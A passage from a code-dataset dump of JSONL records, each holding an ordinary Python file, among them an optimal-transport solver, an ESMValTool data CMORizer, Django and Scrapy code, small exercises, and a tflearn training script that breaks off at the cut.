sock.sendto(message, (local_HOST, local_PORT))\n sock.sendto(message, (remote_HOST, remote_PORT))\n\n time.sleep(0.1) # wait ten millisonds\n\n # rcv_list.append(res.copy())\n loop += 1\n except KeyboardInterrupt:\n break\n","sub_path":"ppm.py","file_name":"ppm.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"400657604","text":"INF = 10 ** 9 + 7\nH, N = map(int, input().split())\nab = [list(map(int, input().split())) for _ in range(N)]\ndp = [INF] * (H + 1)\ndp[0] = 0\n\nfor i in range(N):\n for j in range(H):\n if dp[j] == INF: continue\n if j + ab[i][0] <= H:\n dp[j + ab[i][0]] = min(dp[j + ab[i][0]], dp[j] + ab[i][1])\n else:\n dp[H] = min(dp[H], dp[j] + ab[i][1])\n\nprint(dp[H])","sub_path":"Python_codes/p02787/s864520847.py","file_name":"s864520847.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"87466788","text":"num1, num2, num3, num4 = input().split(\" \");\nnum1 = int(num1);\nnum2 = int(num2);\nnum3 = int(num3);\nnum4 = int(num4);\nif num1 == 1:\n c = 1;\nelif num2 == 1:\n c = 2;\nelif num3 == 1:\n c = 3;\nelif num4 == 1:\n c = 4;\nprint(c);\n","sub_path":"Uri_Online_Judge/2791.py","file_name":"2791.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"321935493","text":"import json\n\nfrom google.appengine.api import app_identity\nfrom webapp2 import Route\n\nfrom catnado.handlers import CONTENT_TYPE, CONTENT_TYPE_JSON\nfrom catnado.handlers.service_api_handler import ServiceAPIHandler\nfrom catnado.testing.app import create_simple_test_app\nfrom catnado.testing.testcase import SimpleAppEngineTestCase\nfrom catnado.utils.api import INBOUND_APP_ID\n\n\nTEST_REQUEST_DATA = {\n 'message': 'hello world'\n}\n\n\nclass SimpleServiceAPIHandler(ServiceAPIHandler):\n\n def test_function(self):\n self.json_response(TEST_REQUEST_DATA)\n\n\nclass ServiceAPIHandlerTest(SimpleAppEngineTestCase):\n\n def setUp(self):\n super(ServiceAPIHandlerTest, self).setUp()\n self.app = create_simple_test_app([\n Route(\n '/test',\n handler=SimpleServiceAPIHandler,\n handler_method='test_function',\n methods=['GET']\n )\n ])\n\n def test_normal_requests_rejected(self):\n response = self.app.get('/test', expect_errors=True)\n self.assertEqual(response.status_int, 403)\n\n def test_urlfetch_requests_accepted(self):\n response = self.app.get('/test', headers={\n INBOUND_APP_ID: app_identity.get_application_id()\n })\n self.assertEqual(response.status_int, 200)\n\n def test_json_response(self):\n response = self.app.get('/test', headers={\n INBOUND_APP_ID: app_identity.get_application_id()\n })\n self.assertEqual(response.status_int, 200)\n self.assertEqual(response.headers.get(CONTENT_TYPE), CONTENT_TYPE_JSON)\n raw_response = response.body\n json_response = json.loads(raw_response)\n self.assertEqual(json_response, TEST_REQUEST_DATA)\n","sub_path":"catnado/handlers/test/test_service_api_handler.py","file_name":"test_service_api_handler.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"203581217","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport re\nimport pymongo\nfrom scrapy.conf import settings\nfrom scrapy.exceptions import DropItem\n\nclass TextPipeline(object):\n def __init__(self):\n self.pa = '\\r\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t(.*)'\n\n def process_item(self, item, spider):\n if item['zhiwu']:\n searchObj = re.match('\\r\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t(.*)',item['zhiwu'])\n item['zhiwu'] = searchObj.group(1)\n return item\n else:\n return DropItem('正则处理失败')\n\n\nclass MongoPipeline(object):\n def __init__(self):\n self.host = settings['MONGO_HOST']\n self.port = settings['MONGO_PORT']\n self.db = settings['MONGO_DB']\n self.clo = settings['MONGO_CLO']\n client = pymongo.MongoClient(host='localhost', port=27017)\n db = client['liepin']\n self.collection = db['jieguo']\n\n def process_item(self, item, spider):\n shuju = dict(item)\n self.collection.insert(shuju)\n return item","sub_path":"zhaopin/zhaopin/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"585641857","text":"#!/usr/bin/env python\n\n\ndef check_answer(game, name):\n print('Answer \"yes\" if the number is even, otherwise answer \"no\".')\n questions = 3\n for _ in range(questions):\n answer, number = game()\n print(f\"Question: {number}\")\n user_input = input(\"Your answer: \")\n if user_input == answer:\n print(\"Correct!\")\n continue\n if user_input != answer:\n print(f\"'{user_input}' is wrong answer ;(. Correct answer was \"\n f\"'{answer}'. \\nLet's try again, {name}! \")\n return\n print(f\"Congratulations, {name}!\")\n","sub_path":"brain_games/games/get_answer.py","file_name":"get_answer.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"274314964","text":"from django.shortcuts import render, redirect\n\nfrom app.common.profile import get_profile\nfrom app.forms.profile import ProfileForm\nfrom app.models import Note\n\n\ndef profile_index(request):\n profile = get_profile()\n notes_count = len(profile.note_set.all())\n\n context = {\n 'profile': profile,\n 'notes_count': notes_count\n }\n\n return render(request, 'profile.html', context)\n\n\ndef create_profile(request):\n if request.method == 'GET':\n context = {\n 'form': ProfileForm()\n }\n\n return render(request, 'home-no-profile.html', context)\n\n else:\n form = ProfileForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('index')\n\n context = {\n 'form': form,\n }\n\n return render(request, 'home-no-profile.html', context)\n","sub_path":"app/views/profiles.py","file_name":"profiles.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"59365883","text":"# -*- coding: utf-8 -*-\n\"\"\"\nGeneral OT solvers with unified API\n\"\"\"\n\n# Author: Remi Flamary \n#\n# License: MIT License\n\nfrom .utils import OTResult\nfrom .lp import emd2\nfrom .backend import get_backend\nfrom .unbalanced import mm_unbalanced, sinkhorn_knopp_unbalanced, lbfgsb_unbalanced\nfrom .bregman import sinkhorn_log\nfrom .partial import partial_wasserstein_lagrange\nfrom .smooth import smooth_ot_dual\n\n\ndef solve(M, a=None, b=None, reg=None, reg_type=\"KL\", unbalanced=None,\n unbalanced_type='KL', n_threads=1, max_iter=None, plan_init=None,\n potentials_init=None, tol=None, verbose=False):\n r\"\"\"Solve the discrete optimal transport problem and return :any:`OTResult` object\n\n The function solves the following general optimal transport problem\n\n .. math::\n \\min_{\\mathbf{T}\\geq 0} \\quad \\sum_{i,j} T_{i,j}M_{i,j} + \\lambda_r R(\\mathbf{T}) +\n \\lambda_u U(\\mathbf{T}\\mathbf{1},\\mathbf{a}) +\n \\lambda_u U(\\mathbf{T}^T\\mathbf{1},\\mathbf{b})\n\n The regularization is selected with `reg` (:math:`\\lambda_r`) and `reg_type`. By\n default ``reg=None`` and there is no regularization. The unbalanced marginal\n penalization can be selected with `unbalanced` (:math:`\\lambda_u`) and\n `unbalanced_type`. By default ``unbalanced=None`` and the function\n solves the exact optimal transport problem (respecting the marginals).\n\n Parameters\n ----------\n M : array_like, shape (dim_a, dim_b)\n Loss matrix\n a : array-like, shape (dim_a,), optional\n Samples weights in the source domain (default is uniform)\n b : array-like, shape (dim_b,), optional\n Samples weights in the source domain (default is uniform)\n reg : float, optional\n Regularization weight :math:`\\lambda_r`, by default None (no reg., exact\n OT)\n reg_type : str, optional\n Type of regularization :math:`R` either \"KL\", \"L2\", \"entropy\", by default \"KL\"\n unbalanced : float, optional\n Unbalanced penalization weight :math:`\\lambda_u`, by default None\n (balanced OT)\n unbalanced_type : str, optional\n Type of unbalanced penalization unction :math:`U` either \"KL\", \"L2\", \"TV\", by default \"KL\"\n n_threads : int, optional\n Number of OMP threads for exact OT solver, by default 1\n max_iter : int, optional\n Maximum number of iteration, by default None (default values in each solvers)\n plan_init : array_like, shape (dim_a, dim_b), optional\n Initialization of the OT plan for iterative methods, by default None\n potentials_init : (array_like(dim_a,),array_like(dim_b,)), optional\n Initialization of the OT dual potentials for iterative methods, by default None\n tol : _type_, optional\n Tolerance for solution precision, by default None (default values in each solvers)\n verbose : bool, optional\n Print information in the solver, by default False\n\n Returns\n -------\n res : OTResult()\n Result of the optimization problem. The information can be obtained as follows:\n\n - res.plan : OT plan :math:`\\mathbf{T}`\n - res.potentials : OT dual potentials\n - res.value : Optimal value of the optimization problem\n - res.value_linear : Linear OT loss with the optimal OT plan\n\n See :any:`OTResult` for more information.\n\n Notes\n -----\n\n The following methods are available for solving the OT problems:\n\n - **Classical exact OT problem** (default parameters):\n\n .. math::\n \\min_\\mathbf{T} \\quad \\langle \\mathbf{T}, \\mathbf{M} \\rangle_F\n\n s.t. \\ \\mathbf{T} \\mathbf{1} = \\mathbf{a}\n\n \\mathbf{T}^T \\mathbf{1} = \\mathbf{b}\n\n \\mathbf{T} \\geq 0\n\n can be solved with the following code:\n\n .. code-block:: python\n\n res = ot.solve(M, a, b)\n\n - **Entropic regularized OT** (when ``reg!=None``):\n\n .. math::\n \\min_\\mathbf{T} \\quad \\langle \\mathbf{T}, \\mathbf{M} \\rangle_F + \\lambda R(\\mathbf{T})\n\n s.t. \\ \\mathbf{T} \\mathbf{1} = \\mathbf{a}\n\n \\mathbf{T}^T \\mathbf{1} = \\mathbf{b}\n\n \\mathbf{T} \\geq 0\n\n can be solved with the following code:\n\n .. code-block:: python\n\n # default is ``\"KL\"`` regularization (``reg_type=\"KL\"``)\n res = ot.solve(M, a, b, reg=1.0)\n # or for original Sinkhorn paper formulation [2]\n res = ot.solve(M, a, b, reg=1.0, reg_type='entropy')\n\n - **Quadratic regularized OT** (when ``reg!=None`` and ``reg_type=\"L2\"``):\n\n .. math::\n \\min_\\mathbf{T} \\quad \\langle \\mathbf{T}, \\mathbf{M} \\rangle_F + \\lambda R(\\mathbf{T})\n\n s.t. \\ \\mathbf{T} \\mathbf{1} = \\mathbf{a}\n\n \\mathbf{T}^T \\mathbf{1} = \\mathbf{b}\n\n \\mathbf{T} \\geq 0\n\n can be solved with the following code:\n\n .. code-block:: python\n\n res = ot.solve(M,a,b,reg=1.0,reg_type='L2')\n\n - **Unbalanced OT** (when ``unbalanced!=None``):\n\n .. math::\n \\min_{\\mathbf{T}\\geq 0} \\quad \\sum_{i,j} T_{i,j}M_{i,j} + \\lambda_u U(\\mathbf{T}\\mathbf{1},\\mathbf{a}) + \\lambda_u U(\\mathbf{T}^T\\mathbf{1},\\mathbf{b})\n\n can be solved with the following code:\n\n .. code-block:: python\n\n # default is ``\"KL\"``\n res = ot.solve(M,a,b,reg=1.0,unbalanced=1.0)\n # quadratic unbalanced OT\n res = ot.solve(M,a,b,reg=1.0,unbalanced=1.0,unbalanced_type='L2')\n # TV = partial OT\n res = ot.solve(M,a,b,reg=1.0,unbalanced=1.0,unbalanced_type='TV')\n\n\n - **Regularized unbalanced regularized OT** (when ``unbalanced!=None`` and ``reg!=None``):\n\n .. math::\n \\min_{\\mathbf{T}\\geq 0} \\quad \\sum_{i,j} T_{i,j}M_{i,j} + \\lambda_r R(\\mathbf{T}) + \\lambda_u U(\\mathbf{T}\\mathbf{1},\\mathbf{a}) + \\lambda_u U(\\mathbf{T}^T\\mathbf{1},\\mathbf{b})\n\n can be solved with the following code:\n\n .. code-block:: python\n\n # default is ``\"KL\"`` for both\n res = ot.solve(M,a,b,reg=1.0,unbalanced=1.0)\n # quadratic unbalanced OT with KL regularization\n res = ot.solve(M,a,b,reg=1.0,unbalanced=1.0,unbalanced_type='L2')\n # both quadratic\n res = ot.solve(M,a,b,reg=1.0, reg_type='L2',unbalanced=1.0,unbalanced_type='L2')\n\n\n .. _references-solve:\n References\n ----------\n\n .. [2] M. Cuturi, Sinkhorn Distances : Lightspeed Computation\n of Optimal Transport, Advances in Neural Information Processing\n Systems (NIPS) 26, 2013\n\n .. [10] Chizat, L., Peyré, G., Schmitzer, B., & Vialard, F. X. (2016).\n Scaling algorithms for unbalanced transport problems.\n arXiv preprint arXiv:1607.05816.\n\n .. [17] Blondel, M., Seguy, V., & Rolet, A. (2018). Smooth and Sparse\n Optimal Transport. Proceedings of the Twenty-First International\n Conference on Artificial Intelligence and Statistics (AISTATS).\n\n .. [34] Feydy, J., Séjourné, T., Vialard, F. X., Amari, S. I., Trouvé,\n A., & Peyré, G. (2019, April). Interpolating between optimal transport\n and MMD using Sinkhorn divergences. In The 22nd International Conference\n on Artificial Intelligence and Statistics (pp. 2681-2690). PMLR.\n\n \"\"\"\n\n # detect backend\n arr = [M]\n if a is not None:\n arr.append(a)\n if b is not None:\n arr.append(b)\n nx = get_backend(*arr)\n\n # create uniform weights if not given\n if a is None:\n a = nx.ones(M.shape[0], type_as=M) / M.shape[0]\n if b is None:\n b = nx.ones(M.shape[1], type_as=M) / M.shape[1]\n\n # default values for solutions\n potentials = None\n value = None\n value_linear = None\n plan = None\n status = None\n\n if reg is None or reg == 0: # exact OT\n\n if unbalanced is None: # Exact balanced OT\n\n # default values for EMD solver\n if max_iter is None:\n max_iter = 1000000\n\n value_linear, log = emd2(a, b, M, numItermax=max_iter, log=True, return_matrix=True, numThreads=n_threads)\n\n value = value_linear\n potentials = (log['u'], log['v'])\n plan = log['G']\n status = log[\"warning\"] if log[\"warning\"] is not None else 'Converged'\n\n elif unbalanced_type.lower() in ['kl', 'l2']: # unbalanced exact OT\n\n # default values for exact unbalanced OT\n if max_iter is None:\n max_iter = 1000\n if tol is None:\n tol = 1e-12\n\n plan, log = mm_unbalanced(a, b, M, reg_m=unbalanced,\n div=unbalanced_type.lower(), numItermax=max_iter,\n stopThr=tol, log=True,\n verbose=verbose, G0=plan_init)\n\n value_linear = log['cost']\n\n if unbalanced_type.lower() == 'kl':\n value = value_linear + unbalanced * (nx.kl_div(nx.sum(plan, 1), a) + nx.kl_div(nx.sum(plan, 0), b))\n else:\n err_a = nx.sum(plan, 1) - a\n err_b = nx.sum(plan, 0) - b\n value = value_linear + unbalanced * nx.sum(err_a**2) + unbalanced * nx.sum(err_b**2)\n\n elif unbalanced_type.lower() == 'tv':\n\n if max_iter is None:\n max_iter = 1000000\n\n plan, log = partial_wasserstein_lagrange(a, b, M, reg_m=unbalanced**2, log=True, numItermax=max_iter)\n\n value_linear = nx.sum(M * plan)\n err_a = nx.sum(plan, 1) - a\n err_b = nx.sum(plan, 0) - b\n value = value_linear + nx.sqrt(unbalanced**2 / 2.0 * (nx.sum(nx.abs(err_a)) +\n nx.sum(nx.abs(err_b))))\n\n else:\n raise (NotImplementedError('Unknown unbalanced_type=\"{}\"'.format(unbalanced_type)))\n\n else: # regularized OT\n\n if unbalanced is None: # Balanced regularized OT\n\n if reg_type.lower() in ['entropy', 'kl']:\n\n # default values for sinkhorn\n if max_iter is None:\n max_iter = 1000\n if tol is None:\n tol = 1e-9\n\n plan, log = sinkhorn_log(a, b, M, reg=reg, numItermax=max_iter,\n stopThr=tol, log=True,\n verbose=verbose)\n\n value_linear = nx.sum(M * plan)\n\n if reg_type.lower() == 'entropy':\n value = value_linear + reg * nx.sum(plan * nx.log(plan + 1e-16))\n else:\n value = value_linear + reg * nx.kl_div(plan, a[:, None] * b[None, :])\n\n potentials = (log['log_u'], log['log_v'])\n\n elif reg_type.lower() == 'l2':\n\n if max_iter is None:\n max_iter = 1000\n if tol is None:\n tol = 1e-9\n\n plan, log = smooth_ot_dual(a, b, M, reg=reg, numItermax=max_iter, stopThr=tol, log=True, verbose=verbose)\n\n value_linear = nx.sum(M * plan)\n value = value_linear + reg * nx.sum(plan**2)\n potentials = (log['alpha'], log['beta'])\n\n else:\n raise (NotImplementedError('Not implemented reg_type=\"{}\"'.format(reg_type)))\n\n else: # unbalanced AND regularized OT\n\n if reg_type.lower() in ['kl'] and unbalanced_type.lower() == 'kl':\n\n if max_iter is None:\n max_iter = 1000\n if tol is None:\n tol = 1e-9\n\n plan, log = sinkhorn_knopp_unbalanced(a, b, M, reg=reg, reg_m=unbalanced, numItermax=max_iter, stopThr=tol, verbose=verbose, log=True)\n\n value_linear = nx.sum(M * plan)\n\n value = value_linear + reg * nx.kl_div(plan, a[:, None] * b[None, :]) + unbalanced * (nx.kl_div(nx.sum(plan, 1), a) + nx.kl_div(nx.sum(plan, 0), b))\n\n potentials = (log['logu'], log['logv'])\n\n elif reg_type.lower() in ['kl', 'l2', 'entropy'] and unbalanced_type.lower() in ['kl', 'l2']:\n\n if max_iter is None:\n max_iter = 1000\n if tol is None:\n tol = 1e-12\n\n plan, log = lbfgsb_unbalanced(a, b, M, reg=reg, reg_m=unbalanced, reg_div=reg_type.lower(), regm_div=unbalanced_type.lower(), numItermax=max_iter, stopThr=tol, verbose=verbose, log=True)\n\n value_linear = nx.sum(M * plan)\n\n value = log['loss']\n\n else:\n raise (NotImplementedError('Not implemented reg_type=\"{}\" and unbalanced_type=\"{}\"'.format(reg_type, unbalanced_type)))\n\n res = OTResult(potentials=potentials, value=value,\n value_linear=value_linear, plan=plan, status=status, backend=nx)\n\n return res\n","sub_path":"ot/solvers.py","file_name":"solvers.py","file_ext":"py","file_size_in_byte":12718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"57474579","text":"from pecan import make_app\nfrom pecan.hooks import TransactionHook\nfrom urlwatch_api import model\n\n\ndef setup_app(config):\n\n model.init_model()\n app_conf = dict(config.app)\n\n return make_app(\n app_conf.pop('root'),\n logging=getattr(config, 'logging', {}),\n hooks = [\n TransactionHook(\n model.start,\n model.start,\n model.commit,\n model.rollback,\n model.clear\n )\n ],\n **app_conf\n )\n","sub_path":"urlwatch_api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"605813749","text":"count = dict()\n\n\nname = input(\"Enter file:\")\nhandle = open(name)\n\nif len(name) < 1: name = \"mbox-short.txt\"\nfor i in handle:\n if not i.startswith('From '):\n continue\n afterslice = i.split()[5]\n line=afterslice[0:2]\n count[line] = count.get(line,0)+1\n \nlst=list() \nfor (value,count) in sorted(count.items()):\n lst.append((value,count))\n print(value, count)\n\n# lst.sort()\n# for value,count in lst:\n# print (value,count)\n\n","sub_path":"dictonary - Copy.py","file_name":"dictonary - Copy.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"107886504","text":"\"\"\"ESMValTool CMORizer for cds-satellite-lai-fapar data.\n\nTier\n Tier 3\nSource\n https://cds.climate.copernicus.eu/cdsapp#!/dataset/satellite-lai-fapar?tab=form\nLast access\n 20190703\n\nDownload and processing instructions\n - Open in a browser the data source as specified above\n - Put the right ticks:\n - Tick variables LAI and FAPAR\n - Tick satellite SPOT (System Pour l'Observation de la Terre)\n - Tick sensor VGT (Vegetation)\n - Tick horizontal resolution 1km\n - Tick product version V1\n - Tick all available years\n - Tick all available months\n - Tick Nominal day 20\n - Click 'submit form'\n - According to ESMValTool practice, put them in the right rawobsdir folder\n\nNotes\n-----\n - This script regrids and cmorizes the above dataset.\n - Request might need to be split into chunks to not exceed download limit\n\nCaveats\n - Fails setting standard name for variable FAPAR\n\nModification history\n 20200512-crezee_bas: adapted to reflect changes in download form by CDS.\n 20190703-crezee_bas: written.\n\"\"\"\n\nimport glob\nimport logging\nimport os\nfrom copy import deepcopy\nfrom datetime import datetime\nfrom warnings import catch_warnings, filterwarnings\n\nimport cf_units\nimport iris\nfrom esmvalcore.preprocessor import regrid\nfrom iris import NameConstraint\n\nfrom esmvaltool.cmorizers.data import utilities as utils\n\nlogger = logging.getLogger(__name__)\n\n\ndef _attrs_are_the_same(cubelist):\n # assume they are the same\n attrs_the_same = True\n allattrs = cubelist[0].attributes\n for key in allattrs:\n try:\n unique_attr_vals = {cube.attributes[key] for cube in cubelist}\n # This exception is needed for valid_range, which is an\n # array and therefore not hashable\n except TypeError:\n unique_attr_vals = {\n tuple(cube.attributes[key])\n for cube in cubelist\n }\n if len(unique_attr_vals) > 1:\n attrs_the_same = False\n print(f\"Different values found for {key}-attribute: \"\n f\"{unique_attr_vals}\")\n return attrs_the_same\n\n\ndef _cmorize_dataset(in_file, var, cfg, out_dir):\n logger.info(\"CMORizing variable '%s' from input file '%s'\",\n var['short_name'], in_file)\n attributes = deepcopy(cfg['attributes'])\n attributes['mip'] = var['mip']\n\n cmor_table = cfg['cmor_table']\n definition = cmor_table.get_variable(var['mip'], var['short_name'])\n\n cube = iris.load_cube(str(in_file),\n constraint=NameConstraint(var_name=var['raw']))\n\n # Set correct names\n cube.var_name = definition.short_name\n if definition.standard_name:\n cube.standard_name = definition.standard_name\n\n cube.long_name = definition.long_name\n\n # Convert units if required\n cube.convert_units(definition.units)\n\n # Set global attributes\n utils.set_global_atts(cube, attributes)\n\n logger.info(\"Saving CMORized cube for variable %s\", cube.var_name)\n utils.save_variable(cube, cube.var_name, out_dir, attributes)\n\n return in_file\n\n\ndef _regrid_dataset(in_dir, var, cfg):\n \"\"\"Regridding of original files.\n\n This function regrids each file and write to disk appending 'regrid'\n in front of filename.\n \"\"\"\n filelist = glob.glob(os.path.join(in_dir, var['file']))\n for infile in filelist:\n _, infile_tail = os.path.split(infile)\n outfile_tail = infile_tail.replace('c3s', 'c3s_regridded')\n outfile = os.path.join(cfg['work_dir'], outfile_tail)\n with catch_warnings():\n filterwarnings(\n action='ignore',\n # Full message:\n # UserWarning: Skipping global attribute 'long_name':\n # 'long_name' is not a permitted attribute\n message=\"Skipping global attribute 'long_name'\",\n category=UserWarning,\n module='iris',\n )\n lai_cube = iris.load_cube(infile,\n constraint=NameConstraint(\n var_name=var['raw']))\n lai_cube = regrid(lai_cube, cfg['custom']['regrid_resolution'],\n 'nearest')\n logger.info(\"Saving: %s\", outfile)\n\n iris.save(lai_cube, outfile)\n\n\ndef _set_time_bnds(in_dir, var):\n \"\"\"Set time_bnds by using attribute and returns a cubelist.\"\"\"\n # This is a complicated expression, but necessary to keep local\n # variables below the limit, otherwise prospector complains.\n cubelist = iris.load(\n glob.glob(\n os.path.join(in_dir, var['file'].replace('c3s', 'c3s_regridded'))))\n\n # The purpose of the following loop is to remove any attributes\n # that differ between cubes (otherwise concatenation over time fails).\n # In addition, care is taken of the time coordinate, by adding the\n # time_coverage attributes as time_bnds to the time coordinate.\n for n_cube, _ in enumerate(cubelist):\n time_coverage_start = cubelist[n_cube].\\\n attributes.pop('time_coverage_start')\n time_coverage_end = cubelist[n_cube].\\\n attributes.pop('time_coverage_end')\n\n # Now put time_coverage_start/end as time_bnds\n # Convert time_coverage_xxxx to datetime\n bnd_a = datetime.strptime(time_coverage_start, \"%Y-%m-%dT%H:%M:%SZ\")\n bnd_b = datetime.strptime(time_coverage_end, \"%Y-%m-%dT%H:%M:%SZ\")\n\n # Put in shape for time_bnds\n time_bnds_datetime = [bnd_a, bnd_b]\n\n # Read dataset time unit and calendar from file\n dataset_time_unit = str(cubelist[n_cube].coord('time').units)\n dataset_time_calender = cubelist[n_cube].coord('time').units.calendar\n # Convert datetime\n time_bnds = cf_units.date2num(time_bnds_datetime, dataset_time_unit,\n dataset_time_calender)\n # Put them on the file\n cubelist[n_cube].coord('time').bounds = time_bnds\n\n return cubelist\n\n\ndef cmorization(in_dir, out_dir, cfg, cfg_user, start_date, end_date):\n \"\"\"Cmorization func call.\"\"\"\n # run the cmorization\n # Pass on the workdir to the cfg dictionary\n cfg['work_dir'] = cfg_user.work_dir\n # If it doesn't exist, create it\n if not os.path.isdir(cfg['work_dir']):\n logger.info(\"Creating working directory for regridding: %s\",\n cfg['work_dir'])\n os.mkdir(cfg['work_dir'])\n\n for short_name, var in cfg['variables'].items():\n var['short_name'] = short_name\n logger.info(\"Processing var %s\", short_name)\n\n # Regridding\n logger.info(\"Start regridding to: %s\",\n cfg['custom']['regrid_resolution'])\n _regrid_dataset(in_dir, var, cfg)\n logger.info(\"Finished regridding\")\n\n # File concatenation\n logger.info(\"Start setting time_bnds\")\n cubelist = _set_time_bnds(cfg['work_dir'], var)\n\n # Loop over two different platform names\n for platformname in ['SPOT-4', 'SPOT-5']:\n # Now split the cubelist on the different platform\n logger.info(\"Start processing part of dataset: %s\", platformname)\n cubelist_platform = cubelist.extract(\n iris.AttributeConstraint(platform=platformname))\n for n_cube, _ in enumerate(cubelist_platform):\n cubelist_platform[n_cube].attributes.pop('identifier')\n if cubelist_platform:\n assert _attrs_are_the_same(cubelist_platform)\n cube = cubelist_platform.concatenate_cube()\n else:\n logger.warning(\n \"No files found for platform %s \\\n (check input data)\", platformname)\n continue\n savename = os.path.join(cfg['work_dir'],\n var['short_name'] + platformname + '.nc')\n logger.info(\"Saving as: %s\", savename)\n iris.save(cube, savename)\n logger.info(\"Finished file concatenation over time\")\n logger.info(\"Start CMORization of file %s\", savename)\n _cmorize_dataset(savename, var, cfg, out_dir)\n logger.info(\"Finished regridding and CMORizing %s\", savename)\n","sub_path":"esmvaltool/cmorizers/data/formatters/datasets/cds_satellite_lai_fapar.py","file_name":"cds_satellite_lai_fapar.py","file_ext":"py","file_size_in_byte":8262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"104617624","text":"# -*- coding: utf-8 -*-\n#from __future__ import print_function\n\nimport numpy as np\nimport tflearn\nimport sys\nimport re\nimport tensorflow as tf\nimport os\nimport matplotlib.pyplot as plt\n\n# Input data\nfilename = '/home/c/桌面/data21.txt'\ntest_filename = '/home/c/桌面/data22.txt'\nduty = []\npos = []\npos_test = []\nduty_test = []\nduty_test1 = []\nduty_test2 = []\nposition1 = []\nposition2 = []\npre_duty_test1 = []\npre_duty_test2 = []\nm = 0\nflag1 = []\nflag2 = []\n\ntext = open(filename, \"r\")\ntrainlines = text.read().splitlines()\nfor line in trainlines: \n line = re.findall(r'-?\\d+\\.?\\d*e?-?\\d*?', line) #提取字符串中的负数小数整数\n m += 1 \n pos.append([float(line[8]),float(line[9]),float(line[10])])\n duty.append([float(line[0]),float(line[1])+256])\nduty = np.array(duty, dtype=np.float32)\npos = np.array(pos, dtype=np.float32)\nduty = tflearn.data_utils.to_categorical(duty, 512)\nfor x in range(m):\n duty[x,:] = duty[x,:] + duty[x+1,:]\n duty = np.delete(duty, x+1, axis=0)\n print(x)\n\nimport h5py\nh5f = h5py.File('data.h5', 'w')\nh5f.create_dataset('duty', data=duty)\nh5f.create_dataset('pos', data=pos)\nh5f.close()\n\n# Load hdf5 dataset\nh5f = h5py.File('data.h5', 'r')\nduty = h5f['duty']\npos = h5f['pos']\n\ntest_text = open(test_filename, \"r\")\ntextlines = test_text.read().splitlines()\nfor line in textlines:\n line = re.findall(r'-?\\d+\\.?\\d*e?-?\\d*?', line) #提取字符串中的负数小数整数\n pos_test.append([float(line[8]),float(line[9]),float(line[10])])\n duty_test.append([float(line[0]),float(line[1])+256])\n duty_test1.append([float(line[0])])\n duty_test2.append([float(line[1])])\npos_test = np.array(pos_test, dtype=np.float32)\nduty_test = np.array(duty_test, dtype=np.float32)\nduty_test1 = np.array(duty_test1, dtype=np.float32)\nduty_test2 = np.array(duty_test2, dtype=np.float32)\n\n#Build neural network\nnet = tflearn.input_data(shape=[None, 3]) \nnet = tflearn.fully_connected(net, 1024, activation='relu')\nnet = tflearn.fully_connected(net, 1024, activation='relu')\nnet = tflearn.fully_connected(net, 1024, activation='relu')\nnet = tflearn.fully_connected(net, 1024, activation='relu')\nnet = tflearn.fully_connected(net, 512, activation='softmax')\nnet = tflearn.regression(net, loss='mean_square')\n\n# Define model\nmodel = tflearn.DNN(net)\n#model_file = os.path.join(\"/home/savage/Desktop\", \"my_dnn\")\n#model.load(model_file)\n\n# Start training (apply gradient descent algorithm)\nmodel.fit(pos, duty, n_epoch=2000, batch_size=128, show_metric=True, validation_set=0.2)\n\nmodel.save('dnn')\n\n# draw pics\nfig = plt.figure()\nax = fig.add_subplot(1,1,1)\nax.plot(range(20),duty_test1[0:20],'b') #展示前50个数据\nax.set_ylim([0,255])\nplt.ion()\nplt.show()\n\nh5f.close()\n\n# Predict probably output\npred = model.predict_label(pos_test)\npred = np.array(pred, dtype=np.float32)\nprint(pred)\nposition1 = np.argmax(pred, axis=1)\nprint(position1)\nposition1 = np.array(position1, dtype=np.float32)\ncolumn = position1.shape[0]\nfor i in range(column):\n if (float(position1[i]) > 255):\n pre_duty_test2.append([float(position1[i])-256])\n flag2.append(1)\n flag1.append(0) \n else:\n pre_duty_test1.append([float(position1[i])]) \n flag1.append(1) \n flag2.append(0)\n pred[i, int(position1[i])] = 0\n \n position2 = np.argmax(pred, axis=1)\n print(position2)\n if (float(position2[i]) > 255):\n if (float(flag2[i]) == 0):\n pre_duty_test2.append([float(position2[i])-256]) \n elif (float(flag2[i]) == 1):\n pre_duty_test1.append([0])\n pre_duty_test2[i] = 0\n else:\n if (float(flag1[i]) == 0):\n pre_duty_test1.append([float(position2[i])]) \n elif (float(flag1[i]) == 1):\n pre_duty_test2.append([0])\n pre_duty_test1[i] = 0\n\ntry:\n ax.lines.remove(lines[0])\nexcept:\n pass\nprint(pre_duty_test1)\nlines = ax.plot(range(20), float(pre_duty_test1[0:20]), 